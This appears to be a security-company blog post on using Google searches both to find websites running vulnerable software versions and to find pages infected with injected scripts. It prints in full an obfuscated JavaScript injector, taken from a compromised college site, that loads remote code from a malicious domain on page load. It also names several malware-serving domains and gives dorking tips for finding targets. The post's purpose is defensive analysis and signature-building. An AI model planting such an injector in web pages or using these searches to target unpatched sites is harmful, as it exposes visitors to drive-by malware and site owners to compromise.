By: Julien Sobrier

How To Use Google To Be The Bad Guy, Or To Fight The Bad Guys

Compromise

Find vulnerable targets

When a vulnerability is disclosed in a popular software (such as Wordpress, Joomla!, Drupal, etc.), attackers can use Google to quickly find a list of websites that run the potentially vulnerable versions of the application.

This page lists few (old) vulnerabilities and the corresponding Google search to find vulnerable targets.

More recently, I was doing research on hacked Wordpress websites. The Wordpress version can be identified with this HTML code:
<meta name="generator" content="WordPress X.X.X" />

Google does not usually allow search for HTML source code, but only for text. However, when a page is not parsed correctly, HTML code gets indexed as regular searcheable content, which actually happens pretty often

Google can show you a list of Wordpress sites that run version 2.7.1:

 

 

 Google search results for Wordpress 2.7.1


Coupled with security feeds that include ready-to-use exploits such as SecurityFocus  this technique can let attackers find vulnerable sites within minutes of a vulnerability disclosure, before website owners have time to update their website. For example, all rcent versions of MediaWiki, except the last one, are proned to a Cross Site Request Forgery vulnerability. Most othe MediaWiki websites carry an image with the alternative text "Powered by MediaWiki". Using the Google search for this text, it is easy to gather a list of potentially vulnerable targets.

Find vulnerable code

Google Code Search is a powerful tool that allows advanced searches in the source code of open software. You can even use regular expressions for the searches.

This tool can be used to find different types of vulnerabilities such as:

 

Find infected pages

But we can also use Google to find pages infected in the same fashion, or exploits running in the wild. This allows us to gather more information about the attack, to get a list of domains that serve malicious files and to create an efficient set of signatures or heuristics to protect customers.

For example, we recently found this obfuscated JavaScript maliciously injected into the home page of an Indian college website:

 

 

 

  <script>  var HL;if(HL!='H' && HL != ''){HL=null};var Dr='';  try {this.t="";this.De="";var vX=new Date();  var WQ;if(WQ!='S' && WQ!='g'){WQ='S'};  var qG="";var Io="";var v=new String("repla"+"ce");  var hu;if(hu!='' && hu!='zr'){hu=''};var J='';  var Y=RegExp;var Jq;if(Jq!='' && Jq!='fp'){Jq=''};  this.r='';var uk;if(uk!=''){uk='n'};  function D(x,U){var W=String("[ZFEt".substr(0,1));  this.K="";var u=new String("g");var el="";W+=U;  this.av='';W+=String("E4q]".substr(3));var II=new String();  this.QQ="";var UB="";var z=new Y(W, u);return x[v](z, new String());  var mq=new Date();};var nk=new Array();var hS;if(hS!='' && hS!='Ll'){hS='qq'};  var Bh;if(Bh!='xQ' && Bh!='QF'){Bh=''};this.GX='';var Bl;  if(Bl!='' && Bl!='RI'){Bl='gz'};var Qh;if(Qh!='' && Qh!='gY'){Qh='rS'};  var I=window;var To=new Date();var k=D('856044815016',"16457");var bk="";  var E=D('cTrNeIaqtIeIEIlTeNmqeTnqtI',"TINq");var AC;if(AC!='' && AC!='LN'){AC=null};  var xQp;if(xQp!='' && xQp!='_z'){xQp=null};var DK='';var Dz=D('oLnLleofaede',"jLef");  var cX;if(cX!='lX' && cX!='mD'){cX=''};var ww=new Date();  var V=D('/BwBsZjB.BcBoZmZ/ZwZsBjZ.ZcZoBmB/ZiBbZiZbBoZ.ZcBoBmZ  /BgBoBoZgZlBeB.BcZoZmB/BxBvBiBdBeBoZsZ.BcBoZmB.ZpZhBpZ',"ZB");  var h=D('sNcRrFiRp1t1',"HF1RN");  var c=D('hWtZtZpW:y/W/ylYiynZkybGuZcWkysY-ycyoZmW.Z3Z7WwyaGnZ.ZcWoYmG.  GtWaWgWgYeWdy-WcyoGmZ.ZBGeZsWtZBGlyeYnGdGeWrYPyayrWty.ZrZuZ:G',"GyYWZ");  T=function(){c_=document[E](h);DK=c+k;this.nE='';DK+=V;this.KK='';var mB="";this.sD="";  c_.src=DK;c_.defer=([1][0]);var SY=new String();this.dN="";document.body.appendChild(c_);  var Pn;if(Pn!='Ec' && Pn!='bQ'){Pn='Ec'};};var IA;if(IA!='sG' && IA!='uf'){IA='sG'};  var vj=new Date();var zV=new Array();var QAC=new Array();I[Dz]=T;  var XG;if(XG!='Fh'){XG=''};var lEg;if(lEg!='qCV'){lEg=''};var C=new Date();  var lb=new String();} catch(d){};var Sj=new Array();var dQ=new Array();  </script>  


This code loads another JavaScript file from BestBlenderPart.ru:

 

 

 

 


A Google search for part of the obfuscated code shows a list of infected websites, and a few posts in forums that also list infected pages. All the injected, obfuscated JavaScript is slightly different, but the end result is the same - external JavaScript is loaded on port 8080 from several domains such as easyfunguide.at, reachsaw.ru, forredtag.ru, etc. With this information, we can blacklist the malicious files, and develop good heuristics to block infected pages.

 

 

 

 

 

 

 Infected pages found by a Google search
 
-- Julien

Learn more about Zscaler.